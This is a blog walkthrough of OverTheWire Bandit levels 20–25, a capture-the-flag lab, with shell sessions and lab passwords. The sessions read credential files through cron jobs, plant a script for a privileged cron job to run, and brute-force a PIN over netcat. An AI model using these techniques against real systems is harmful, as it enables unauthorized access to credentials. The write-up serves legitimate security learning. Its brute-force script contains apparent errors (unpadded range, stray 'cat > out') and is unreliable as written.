DEV Community

Cover image for OverTheWire :- Bandit (Level 20–25) [CTF]
Shubham Patel
Shubham Patel

Posted on

OverTheWire :- Bandit (Level 20–25) [CTF]

#challenge #linux #showdev #security

Alt Text

Level 20 → Level 21

Level Goal

There is a setuid binary in the homedirectory that does the following: it makes a connection to localhost on the port you specify as a commandline argument. It then reads a line of text from the connection and compares it to the password in the previous level (bandit20). If the password is correct, it will transmit the password for the next level (bandit21).

NOTE: Try connecting to your own network daemon to see if it works as you think

$ ssh bandit20@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit20@bandit.labs.overthewire.org's password: GbKksEFF4yrVs6il55v6gwY5aVje5f0j

Solution 

bandit20@bandit:~$ echo "GbKksEFF4yrVs6il55v6gwY5aVje5f0j" | nc -l localhost -p 33333 &
[1] 25823
bandit20@bandit:~$ ./suconnect 33333
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr
Enter fullscreen mode Exit fullscreen mode

Level 21 → Level 22

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

$ ssh bandit21@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit21@bandit.labs.overthewire.org's password:
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

Solution 

bandit21@bandit:~$ cd /etc/cron.d

bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null

bandit21@bandit:~$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv

bandit21@bandit:~$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
Enter fullscreen mode Exit fullscreen mode

Level 22 → Level 23

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: Looking at shell scripts written by other people is a very useful skill. The script for this level is intentionally made easy to read. If you are having problems understanding what it does, try executing it to see the debug information it prints.

$ ssh bandit22@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit22@bandit.labs.overthewire.org's password:
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

Solution 

bandit22@bandit:~$ cd /etc/cron.d

bandit22@bandit:/etc/cron.d$ ls -l
total 24
-rw-r--r-- 1 root root  62 May 14 13:40 cronjob_bandit15_root
-rw-r--r-- 1 root root  62 Jul 11 15:56 cronjob_bandit17_root
-rw-r--r-- 1 root root 120 May  7 20:14 cronjob_bandit22
-rw-r--r-- 1 root root 122 May  7 20:14 cronjob_bandit23
-rw-r--r-- 1 root root 120 May 14 09:41 cronjob_bandit24
-rw-r--r-- 1 root root  62 May 14 14:04 cronjob_bandit25_root

bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null

bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget

bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349

bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n
Enter fullscreen mode Exit fullscreen mode

Level 23 → Level 24

Level Goal

A program is running automatically at regular intervals from cron, the time-based job scheduler. Look in /etc/cron.d/ for the configuration and see what command is being executed.

NOTE: This level requires you to create your own first shell-script. This is a very big step and you should be proud of yourself when you beat this level!

NOTE 2: Keep in mind that your shell script is removed once executed, so you may want to keep a copy around…

$ ssh bandit23@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit23@bandit.labs.overthewire.org's password:
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

Solution 

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done
Enter fullscreen mode Exit fullscreen mode

Approach

Create a directory in the /tmp/ folder. Create a shell script to copy the /etc/bandit_pass/bandit24 to our /tmp/folder. Copy the shell script to /var/spool/bandit24/. Give the shell script and the /tmp/ folder appropriate permissions.

bandit23@bandit:~$ mkdir /tmp/abc
bandit23@bandit:~$ cd /tmp/abc
bandit23@bandit:/tmp/abc$ cat > abc.sh
        #!/bin/bash
        cat /etc/bandit_pass/bandit24 >> /tmp/abc/pass24


bandit23@bandit:/tmp/abc$ chmod 777 /tmp/abc
bandit23@bandit:/tmp/abc$ chmod 777 abc.sh
bandit23@bandit:/tmp/abc$ cp abc.sh /var/spool/bandit24/

--------------after some time -------------------

bandit23@bandit:/tmp/abc$ cat pass24
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ
Enter fullscreen mode Exit fullscreen mode

Level 24 -> Level 25

Level Goal

A daemon is listening on port 30002 and will give you the password for bandit25 if given the password for bandit24 and a secret numeric 4-digit pincode. There is no way to retrieve the pincode except by going through all of the 10000 combinations, called brute-forcing.

$ ssh bandit24@bandit.labs.overthewire.org -p 2220
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit24@bandit.labs.overthewire.org's password:
UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

Solution 

bandit24@bandit:~$ mkdir /tmp/aaaa
bandit24@bandit:~$ cd /tmp/aaaa
bandit24@bandit:/tmp/aaaa$ cat > abc.sh
    #!/bin/bash
    for i in {1..10000}
    do
        echo "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ $i" >> ./out
    done
    cat > out

bandit24@bandit:/tmp/aaaa$ chmod +x abc.sh
bandit24@bandit:/tmp/aaaa$ ./abc.sh
bandit24@bandit:/tmp/aaaa$ cat out | nc localhost 30002

-----------You will get password-----------
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG
Enter fullscreen mode Exit fullscreen mode

THANKS FOR READING ...!!

Top comments (0)

Read next

codingashish_dev profile image

Step-by-Step Guide to Installing PostgreSQL on Arch Linux

Ashish Prajapati -

yassinesallami profile image

How to create an image authentication system with python streamlit and canva!

Yassine Sallami -

yassinesallami profile image

Introducing the DNA-KEY System: Taking the Password Generator to the Next Level! 🔐

Yassine Sallami -

deverm profile image

Yami - An Open-Source Music Player With Simple Ui

deverm -